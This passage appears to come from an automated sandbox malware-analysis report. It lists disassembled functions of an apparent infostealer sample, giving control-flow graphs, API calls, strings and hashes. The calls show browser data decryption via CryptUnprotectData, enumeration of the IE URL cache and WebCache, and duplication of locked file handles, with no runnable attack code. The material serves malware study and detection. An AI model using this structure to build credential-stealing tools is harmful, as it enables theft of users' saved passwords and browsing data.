                                                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                          • String ID: chp$v10
                                                                                                                          • API String ID: 1297422669-2783969131
                                                                                                                          • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                          • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                          Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 512 40e304-40e316 call 406e8f 510->512 516 40e476-40e483 call 406b53 512->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->512 524->509 530 40e497-40e49f free 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 553 40e3c3-40e3c6 550->553 551->552 554 40e416-40e427 memcpy 552->554 555 40e42a-40e42f 552->555 553->541 554->555 556 40e431-40e442 memcpy 555->556 557 40e445-40e44a 555->557 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                          • free.MSVCRT ref: 0040E49A
                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                          • memset.MSVCRT ref: 0040E380
                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                          • API String ID: 3849927982-2252543386
                                                                                                                          • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                          • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                          Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004091E2
                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                          • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                          • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                          • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                          • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                          • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3715365532-3916222277
                                                                                                                          • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                          • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                          Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                            • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                          • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                          • String ID: bhv
                                                                                                                          • API String ID: 4234240956-2689659898
                                                                                                                          • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                          • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                          Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                          • API String ID: 2941347001-70141382
                                                                                                                          • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                          • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                          Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                          • String ID: visited:
                                                                                                                          • API String ID: 2470578098-1702587658
                                                                                                                          • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                          • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                          Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                          • free.MSVCRT ref: 0040E28B
                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                          • API String ID: 2804212203-2982631422
                                                                                                                          • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                          • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                          Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                          • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 115830560-3916222277
                                                                                                                          • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                          • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                          Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 852 418506-418515 free 845->852 846->845 852->830
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                          • free.MSVCRT ref: 0041848B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile$ErrorLastfree
                                                                                                                          • String ID: |A
                                                                                                                          • API String ID: 77810686-1717621600
                                                                                                                          • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
